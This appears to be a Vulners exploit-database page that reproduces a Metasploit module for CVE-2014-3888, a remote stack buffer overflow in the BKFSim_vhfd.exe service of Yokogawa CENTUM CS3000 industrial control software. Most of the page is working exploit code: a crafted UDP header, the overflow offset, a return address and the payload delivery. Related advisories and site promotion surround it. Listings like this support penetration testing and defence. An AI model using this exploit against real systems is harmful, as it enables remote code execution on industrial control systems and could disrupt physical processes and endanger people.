Vulners
Lucene search
Yokogawa CS3000 - 'BKFSim_vhfd.exe' Remote Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow Exploit | 8 Jul 201400:00 | – | zdt |
 | CVE-2014-3888 | 29 May 201815:50 | – | circl |
 | Yokogawa CS3000 SCADA BKFSim_vhfd.exe Remote Code Execution (CVE-2014-3888) | 10 Aug 201400:00 | – | checkpoint_advisories |
 | CVE-2014-3888 | 10 Jul 201410:00 | – | cve |
 | CVE-2014-3888 | 10 Jul 201410:00 | – | cvelist |
 | Yokogawa Centum Buffer Overflow Vulnerability | 10 Apr 201406:00 | – | ics |
 | Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow | 7 Jul 201416:20 | – | metasploit |
 | CVE-2014-3888 | 10 Jul 201411:06 | – | nvd |
 | Yokogawa Exaopc Improper Restriction of Operations within the Bounds of a Memory Buffer | 8 Nov 201900:00 | – | nessus |
| Yokogawa CENTUM, Exaopc and B/M9000 Stack-based Buffer Overflow (CVE-2014-3888) | 7 Feb 202200:00 | – | nessus |
10
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',
'Description' => %q{
This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create
logs using functions like vsprintf and memcpy in a insecure way. This module has been
tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.
},
'Author' =>
[
'Redsadic <julian.vilas[at]gmail.com>',
'juan vazquez'
],
'References' =>
[
['CVE', '2014-3888'],
['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],
['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']
],
'Payload' =>
{
'Space' => 1770, # 2228 (max packet length) - 16 (header) - (438 target['Offset']) - 4 (ret)
'DisableNops' => true,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',
{
'Ret' => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll
'Offset' => 438
}
],
],
'DisclosureDate' => 'May 23 2014',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(20010)
], self.class)
end
def exploit
connect_udp
sploit = "\x45\x54\x56\x48\x01\x01\x10\x09\x00\x00\x00\x01\x00\x00\x00\x44" # header
sploit << rand_text(target['Offset'])
sploit << [target.ret].pack("V")
sploit << payload.encoded
print_status("Trying target #{target.name}, sending #{sploit.length} bytes...")
udp_sock.put(sploit)
disconnect_udp
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2014 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 28.3
EPSS0.2899